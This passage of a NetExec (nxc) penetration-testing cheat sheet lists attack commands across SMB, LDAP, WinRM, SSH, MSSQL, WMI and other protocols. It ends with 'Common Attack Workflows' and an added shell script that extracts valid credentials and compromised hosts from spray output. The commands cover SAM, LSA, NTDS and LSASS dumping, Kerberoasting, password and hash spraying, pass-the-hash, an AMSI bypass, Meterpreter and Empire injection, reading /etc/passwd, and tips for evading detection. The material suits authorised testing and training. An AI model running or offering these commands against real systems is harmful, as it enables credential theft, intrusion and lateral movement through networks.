192.168.1.10 -u admin -p pass -M remote-uac                # Remote UAC\n\n# Registry Operations\nnxc smb 192.168.1.10 -u admin -p pass -M reg-query                 # Registry query\nnxc smb 192.168.1.10 -u admin -p pass -M reg-winlogon              # Winlogon creds\n\n# Utility\nnxc smb 192.168.1.10 -u admin -p pass -M test_connection           # Test connectivity\n```\n\n---\n\n## LDAP Protocol (Port 389/636)\n\n### Basic Enumeration\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN\nnxc ldap 192.168.1.10 -u user -p pass 
-d DOMAIN --users           # Enumerate all users\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users user123   # Specific user\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --users-export out.txt\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups          # Enumerate all groups\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --groups \"Domain Admins\"\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --computers       # Enumerate computers\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --dc-list         # List DCs\nnxc ldap 192.168.1.10 -u user -p pass -d DOMAIN --get-sid         # Get domain SID\n```\n\n### Advanced Queries\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --admin-count               # adminCount=1 users\nnxc ldap 192.168.1.10 -u user -p pass --trusted-for-delegation    # Unconstrained delegation (TRUSTED_FOR_DELEGATION)\nnxc ldap 192.168.1.10 -u user -p pass --password-not-required     # PASSWD_NOTREQD accounts (empty password allowed)\nnxc ldap 192.168.1.10 -u user -p pass --active-users              # Active accounts only\nnxc ldap 192.168.1.10 -u user -p pass --find-delegation           # Delegation relationships\n\n# GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa                       # Enumerate GMSA\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-convert-id gmsa_name\nnxc ldap 192.168.1.10 -u user -p pass --gmsa-decrypt-lsa lsa_data\n\n# Custom LDAP Query\nnxc ldap 192.168.1.10 -u user -p pass --query \"(objectClass=user)\" \"cn,sAMAccountName\"\nnxc ldap 192.168.1.10 -u user -p pass --base-dn \"OU=Users,DC=domain,DC=local\"\n```\n\n### Kerberoasting & ASREPRoasting\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --kerberoasting output.txt\nnxc ldap 192.168.1.10 -u user -p pass --asreproast output.txt\n```\n\n### Bloodhound Collection\n```bash\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c All\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Default\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c 
DCOnly\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Session,LoggedOn\nnxc ldap 192.168.1.10 -u user -p pass --bloodhound -c Group,LocalAdmin,ACL\n```\n\n### LDAP Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc ldap 192.168.1.10 -u user -p pass -M adcs                      # Find ADCS/PKI\nnxc ldap 192.168.1.10 -u user -p pass -M daclread                  # Read DACLs\nnxc ldap 192.168.1.10 -u user -p pass -M enum_trusts               # Trust relationships\nnxc ldap 192.168.1.10 -u user -p pass -M find-computer             # Find computers\nnxc ldap 192.168.1.10 -u user -p pass -M get-desc-users            # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M get-network               # DNS records/IPs\nnxc ldap 192.168.1.10 -u user -p pass -M get-unixUserPassword      # Unix passwords\nnxc ldap 192.168.1.10 -u user -p pass -M get-userPassword          # User passwords\nnxc ldap 192.168.1.10 -u user -p pass -M groupmembership           # User group membership\nnxc ldap 192.168.1.10 -u user -p pass -M laps                      # LAPS passwords\nnxc ldap 192.168.1.10 -u user -p pass -M ldap-checker              # LDAP signing/binding\nnxc ldap 192.168.1.10 -u user -p pass -M maq                       # MachineAccountQuota\nnxc ldap 192.168.1.10 -u user -p pass -M obsolete                  # Obsolete OS\nnxc ldap 192.168.1.10 -u user -p pass -M pre2k                     # Pre-created accounts\nnxc ldap 192.168.1.10 -u user -p pass -M pso                       # Password policies\nnxc ldap 192.168.1.10 -u user -p pass -M sccm                      # SCCM infrastructure\nnxc ldap 192.168.1.10 -u user -p pass -M subnets                   # Sites and subnets\nnxc ldap 192.168.1.10 -u user -p pass -M user-desc                 # User descriptions\nnxc ldap 192.168.1.10 -u user -p pass -M whoami                    # Current user details\n```\n\n---\n\n## WinRM Protocol (Port 5985/5986)\n\n### Basic Usage\n```bash\nnxc winrm 192.168.1.10 -u admin -p 
pass\nnxc winrm 192.168.1.10 -u admin -H \nnxc winrm 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc winrm 192.168.1.10 -u admin -p pass --local-auth\nnxc winrm 192.168.1.10 -u admin -p pass --laps                     # LAPS auth\n```\n\n### Port Configuration\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985                # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5986                # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --port 5985 5986           # Both ports\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http         # HTTP only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto https        # HTTPS only\nnxc winrm 192.168.1.10 -u admin -p pass --check-proto http https   # Both protocols\nnxc winrm 192.168.1.10 -u admin -p pass --http-timeout 15          # Timeout\n```\n\n### Command Execution\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc winrm 192.168.1.10 -u admin -p pass -X '$PSVersionTable'\nnxc winrm 192.168.1.10 -u admin -p pass -x \"ipconfig /all\"\nnxc winrm 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### Credential Dumping\n```bash\nnxc winrm 192.168.1.10 -u admin -p pass --sam                      # Dump SAM\nnxc winrm 192.168.1.10 -u admin -p pass --lsa                      # Dump LSA\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method cmd          # Using cmd\nnxc winrm 192.168.1.10 -u admin -p pass --dump-method powershell   # Using PowerShell\n```\n\n### WinRM Modules\n```bash\n# No modules available for WinRM protocol in current version\n```\n\n---\n\n## SSH Protocol (Port 22)\n\n### Authentication\n```bash\nnxc ssh 192.168.1.10 -u root -p password\nnxc ssh 192.168.1.10 -u root -p passwords.txt\nnxc ssh 192.168.1.10 -u root --key-file id_rsa\nnxc ssh 192.168.1.10 -u root --key-file id_rsa -p passphrase\nnxc ssh 192.168.1.10 -u users.txt -p passwords.txt\nnxc ssh 192.168.1.10 -u root -p pass --port 2222\nnxc ssh 192.168.1.10 -u root -p pass 
--ssh-timeout 20\n```\n\n### Command Execution\n```bash\nnxc ssh 192.168.1.10 -u root -p pass -x \"cat /etc/passwd\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"uname -a\"\nnxc ssh 192.168.1.10 -u root -p pass -x \"id\"\nnxc ssh 192.168.1.10 -u root -p pass --no-output -x \"command\"\n```\n\n### Sudo Operations\n```bash\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check                  # Check sudo privs\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method sudo-stdin\nnxc ssh 192.168.1.10 -u user -p pass --sudo-check-method mkfifo\nnxc ssh 192.168.1.10 -u user -p pass --get-output-tries 10\n```\n\n### File Operations\n```bash\nnxc ssh 192.168.1.10 -u root -p pass --put-file local.txt /tmp/remote.txt\nnxc ssh 192.168.1.10 -u root -p pass --get-file /etc/passwd ./passwd.txt\n```\n\n### SSH Modules\n```bash\n# No modules available for SSH protocol in current version\n```\n\n---\n\n## RDP Protocol (Port 3389)\n\n### Check Access\n```bash\nnxc rdp 192.168.1.10 -u admin -p password\nnxc rdp 192.168.1.10 -u admin -H \nnxc rdp 192.168.1.10 -u users.txt -p passwords.txt -d DOMAIN\nnxc rdp 192.168.1.10 -u admin -p pass --local-auth\nnxc rdp 192.168.1.10 -u admin -p pass --port 3390\nnxc rdp 192.168.1.10 -u admin -p pass --rdp-timeout 10\n```\n\n### Screenshots\n```bash\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --screentime 10\nnxc rdp 192.168.1.10 -u admin -p pass --screenshot --res 1920x1080\nnxc rdp 192.168.1.10 -u admin -p pass --nla-screenshot             # If NLA disabled\n```\n\n### RDP Modules\n```bash\n# No modules available for RDP protocol in current version\n```\n\n---\n\n## MSSQL Protocol (Port 1433)\n\n### Authentication\n```bash\nnxc mssql 192.168.1.10 -u sa -p password\nnxc mssql 192.168.1.10 -u sa -p password --local-auth\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN\nnxc mssql 192.168.1.10 -u user -p pass -d DOMAIN -k              # Kerberos\nnxc mssql 192.168.1.10 -u sa -H \nnxc mssql 
192.168.1.10 -u sa -p pass --port 1434\nnxc mssql 192.168.1.10 -u sa -p pass --mssql-timeout 10\n```\n\n### Queries\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT @@version\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.databases\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"SELECT name FROM sys.server_principals\"\nnxc mssql 192.168.1.10 -u sa -p pass -q \"EXEC sp_helprotect\"\n```\n\n### Command Execution\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -x \"whoami\"                 # via xp_cmdshell\nnxc mssql 192.168.1.10 -u sa -p pass -X 'Get-Host'               # PowerShell\nnxc mssql 192.168.1.10 -u sa -p pass --no-output -x \"command\"\n```\n\n### PowerShell Options\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --force-ps32\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --obfs\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --amsi-bypass bypass.ps1\nnxc mssql 192.168.1.10 -u sa -p pass -X 'command' --no-encode\nnxc mssql 192.168.1.10 -u sa -p pass --clear-obfscripts\n```\n\n### File Operations\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --put-file local.txt C:\\\\Temp\\\\remote.txt\nnxc mssql 192.168.1.10 -u sa -p pass --get-file C:\\\\Temp\\\\file.txt ./local.txt\n```\n\n### Enumeration\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute                  # RID bruteforce\nnxc mssql 192.168.1.10 -u sa -p pass --rid-brute 5000\n```\n\n### MSSQL Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u user -p pass -M enum_impersonate        # Impersonation privs\nnxc mssql 192.168.1.10 -u user -p pass -M enum_logins             # SQL logins\nnxc mssql 192.168.1.10 -u user -p pass -M exec_on_link            # Execute on linked server\nnxc mssql 192.168.1.10 -u user -p pass -M link_enable_xp          # Enable xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M link_xpcmd              # Run xp_cmdshell on link\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_coerce            
# Coerce authentication via SQL procedures (xp_dirtree etc.)\nnxc mssql 192.168.1.10 -u user -p pass -M mssql_priv              # Enumerate/exploit privs\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc mssql 192.168.1.10 -u sa -p pass -M empire_exec               # Empire agent\nnxc mssql 192.168.1.10 -u sa -p pass -M enum_links                # Enumerate linked servers\nnxc mssql 192.168.1.10 -u sa -p pass -M met_inject                # Meterpreter injection\nnxc mssql 192.168.1.10 -u sa -p pass -M nanodump                  # LSASS dump\nnxc mssql 192.168.1.10 -u sa -p pass -M test_connection           # Test connectivity\nnxc mssql 192.168.1.10 -u sa -p pass -M web_delivery              # Web delivery\n```\n\n---\n\n## FTP Protocol (Port 21)\n\n### Authentication\n```bash\nnxc ftp 192.168.1.10 -u admin -p password\nnxc ftp 192.168.1.10 -u anonymous -p ''\nnxc ftp 192.168.1.10 -u users.txt -p passwords.txt\nnxc ftp 192.168.1.10 -u admin -p pass --port 2121\n```\n\n### File Operations\n```bash\nnxc ftp 192.168.1.10 -u admin -p pass --ls                        # List root\nnxc ftp 192.168.1.10 -u admin -p pass --ls /var/www\nnxc ftp 192.168.1.10 -u admin -p pass --get file.txt\nnxc ftp 192.168.1.10 -u admin -p pass --put local.txt remote.txt\n```\n\n### FTP Modules\n```bash\n# No modules available for FTP protocol in current version\n```\n\n---\n\n## VNC Protocol (Port 5900)\n\n### Authentication\n```bash\nnxc vnc 192.168.1.10 -u admin -p password\nnxc vnc 192.168.1.10 -u admin -p passwords.txt\nnxc vnc 192.168.1.10 -u admin -p pass --port 5901\nnxc vnc 192.168.1.10 -u admin -p pass --vnc-sleep 5               # Rate limiting\n```\n\n### Screenshot\n```bash\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot\nnxc vnc 192.168.1.10 -u admin -p pass --screenshot --screentime 5\n```\n\n### VNC Modules\n```bash\n# No modules available for VNC protocol in current version\n```\n\n---\n\n## NFS Protocol (Port 2049, portmapper 111)\n\n### Enumeration\n```bash\nnxc nfs 192.168.1.10                                               
# Basic enumeration\nnxc nfs 192.168.1.10 --shares                                      # List shares\nnxc nfs 192.168.1.10 --enum-shares                                 # Enumerate shares (depth 3)\nnxc nfs 192.168.1.10 --enum-shares 5                               # Custom depth\nnxc nfs 192.168.1.10 --port 2049\nnxc nfs 192.168.1.10 --nfs-timeout 10\n```\n\n### Share Operations\n```bash\nnxc nfs 192.168.1.10 --share /export --ls                          # List share root\nnxc nfs 192.168.1.10 --share /export --ls /path/to/dir\nnxc nfs 192.168.1.10 --share /export --get-file remote.txt local.txt\nnxc nfs 192.168.1.10 --share /export --put-file local.txt remote.txt\n```\n\n### NFS Modules\n```bash\n# No modules available for NFS protocol in current version\n```\n\n---\n\n## WMI Protocol (Port 135)\n\n### Basic Usage\n```bash\nnxc wmi 192.168.1.10 -u admin -p password\nnxc wmi 192.168.1.10 -u admin -H \nnxc wmi 192.168.1.10 -u admin -p pass -d DOMAIN\nnxc wmi 192.168.1.10 -u admin -p pass --local-auth\nnxc wmi 192.168.1.10 -u admin -p pass --rpc-timeout 5\n```\n\n### WMI Queries\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Process\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_Service\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi \"SELECT * FROM Win32_ComputerSystem\"\nnxc wmi 192.168.1.10 -u admin -p pass --wmi-namespace \"root\\cimv2\"\n```\n\n### Command Execution\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-method wmiexec-event -x \"whoami\"\nnxc wmi 192.168.1.10 -u admin -p pass --exec-timeout 10\nnxc wmi 192.168.1.10 -u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler            
        # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon                  # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256                       # Number of threads (default: 256)\n--timeout 10                 # Connection timeout in seconds\n--jitter 5                   # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose                    # Verbose output\n--debug                      # Debug mode\n--log output.log             # Save output to file\n--no-progress                # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6                           # Force IPv6\n--dns-server 8.8.8.8         # Custom DNS server\n--dns-tcp                    # Use TCP for DNS queries\n--dns-timeout 3              # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1                        # Use credential ID from database\n-id 1 2 3                    # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https               # Use HTTPS server (default)\n--server http                # Use HTTP server\n--server-host 0.0.0.0        # Bind server to IP\n--server-port 8000           # Server port\n--connectback-host IP        # Connectback IP for remote system\n```\n\n### Database\n```bash\nnxcdb                        # Access NXC database (interactive shell; cmedb was the CrackMapExec name)\nexport smb                   # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L                    
          # List all SMB modules\nnxc smb -M  --options           # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. 
Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H  -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to pair user and password files line by line (user1:password1, user2:password2) instead of trying every combination; by default nxc already stops at the first valid credential per host\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs the NT hash (`-H` accepts `NT` or `LM:NT`)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `nxcdb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}]}
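An added example, not from the NetExec project or the cheat sheet above: POSIX shell helpers that triage nxc's text output for the Initial Enumeration, Password Spraying and Lateral Movement workflows, turning a host scan into a relay candidate list and a spray log into valid credentials, local-admin targets and a lockout stop signal. The two sample outputs are constructed to mimic nxc's smb column layout (protocol, IP, port, hostname, status marker, then the message); the hosts, domain and credentials in them are made up.

```shell
#!/bin/sh
# Added example (not NetExec's own code). Parses nxc smb output lines.
set -eu

# CONSTRUCTED sample of `nxc smb 192.168.1.0/24` (host discovery, no creds).
# Columns: PROTO IP PORT HOSTNAME MARKER MESSAGE...
SAMPLE_SCAN='SMB         192.168.1.5     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         192.168.1.20    445    FS01             [*] Windows 10 Build 19041 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         192.168.1.21    445    WS07             [*] Windows 10 Build 19041 x64 (name:WS07) (domain:corp.local) (signing:False) (SMBv1:True)'

# CONSTRUCTED sample of a spray:
#   nxc smb targets.txt -u users.txt -p 'Winter2024!' --continue-on-success
SAMPLE_SPRAY='SMB         192.168.1.20    445    FS01             [-] corp.local\jdoe:Winter2024! STATUS_LOGON_FAILURE
SMB         192.168.1.20    445    FS01             [+] corp.local\asmith:Winter2024!
SMB         192.168.1.21    445    WS07             [+] corp.local\asmith:Winter2024! (Pwn3d!)
SMB         192.168.1.5     445    DC01             [-] corp.local\asmith:Winter2024! STATUS_ACCOUNT_LOCKED_OUT'

# Hosts that do not require SMB signing: NTLM relay candidates
# (the same selection --gen-relay-list makes). Prints one IP per line.
relay_candidates() {
    printf '%s\n' "$1" | awk '/\(signing:False\)/ { print $2 }'
}

# Valid credentials: nxc marks successful logons with "[+]" and prints
# DOMAIN\user:password as the next field. Deduplicated across hosts.
valid_creds() {
    printf '%s\n' "$1" | awk '$5 == "[+]" { print $6 }' | sort -u
}

# Hosts where the credential is local admin: nxc appends "(Pwn3d!)".
# These are the targets.txt candidates for -x / --sam / lsassy.
pwned_hosts() {
    printf '%s\n' "$1" | awk '/\(Pwn3d!\)/ { print $2 }' | sort -u
}

# Lockout signal: exit 0 if any line reports STATUS_ACCOUNT_LOCKED_OUT,
# which means the spray must stop before it locks out more accounts.
lockout_seen() {
    printf '%s\n' "$1" | grep -q 'STATUS_ACCOUNT_LOCKED_OUT'
}

# Stand-alone demo on the constructed samples.
printf 'Relay candidates (signing:False):\n'
relay_candidates "$SAMPLE_SCAN"
printf 'Valid credentials:\n'
valid_creds "$SAMPLE_SPRAY"
printf 'Local-admin hosts:\n'
pwned_hosts "$SAMPLE_SPRAY"
if lockout_seen "$SAMPLE_SPRAY"; then
    printf 'Lockout observed: stop spraying and check the lockout policy\n'
fi
```

In practice, capture the real output with `nxc smb 192.168.1.0/24 | tee scan.log` and feed it in with `relay_candidates "$(cat scan.log)" > relay.txt`; the spray helpers work the same way on a `--continue-on-success` run saved with `--log`. The field numbers assume nxc's default column layout, so run with `--no-progress` when logging so progress-bar output does not interleave with the lines.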